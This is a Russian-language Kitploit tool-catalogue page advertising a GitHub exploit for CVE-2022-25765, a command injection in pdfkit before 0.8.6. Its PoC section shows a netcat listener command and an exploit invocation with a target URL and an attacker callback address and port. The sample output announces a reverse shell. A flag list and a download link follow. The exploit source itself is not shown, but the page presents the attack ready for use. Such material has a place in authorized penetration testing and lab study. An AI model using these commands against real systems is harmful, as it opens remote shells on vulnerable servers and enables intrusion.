Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PDFkit-CMD-Injection-CVE-2022-25765 — Эксплойт для CVE-2022-25765: внедрение команд в pdfkit < 0.8.6 | Kitploit
Инструменты/GitHubGitHub/nikn0laty/pdfkit-cmd-injection-cve-2022-25765
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubnikn0laty/pdfkit-cmd-injection-cve-2022-25765

PDFkit-CMD-Injection-CVE-2022-25765

Эксплойт для CVE-2022-25765: внедрение команд в pdfkit < 0.8.6

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
1063 лет назадЕщё не проверено

PDFkit-CMD-Injection (CVE-2022-25765)

Эксплойт для CVE-2022-25765 — внедрение команд в pdfkit < 0.8.6

Подробнее об уязвимости здесь

PoC

Запустите netcat на вашем хосте:

root@kitploit:~
$ nc -lvnp 1337

Запустите эксплойт (пример):

root@kitploit:~
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection

Флаги:

root@kitploit:~
-t, --target  Адрес цели в формате http
-a, --addr    Адрес для обратного подключения
-p, --port    Порт для обратного подключения, по умолчанию 9001       
Скачать инструмент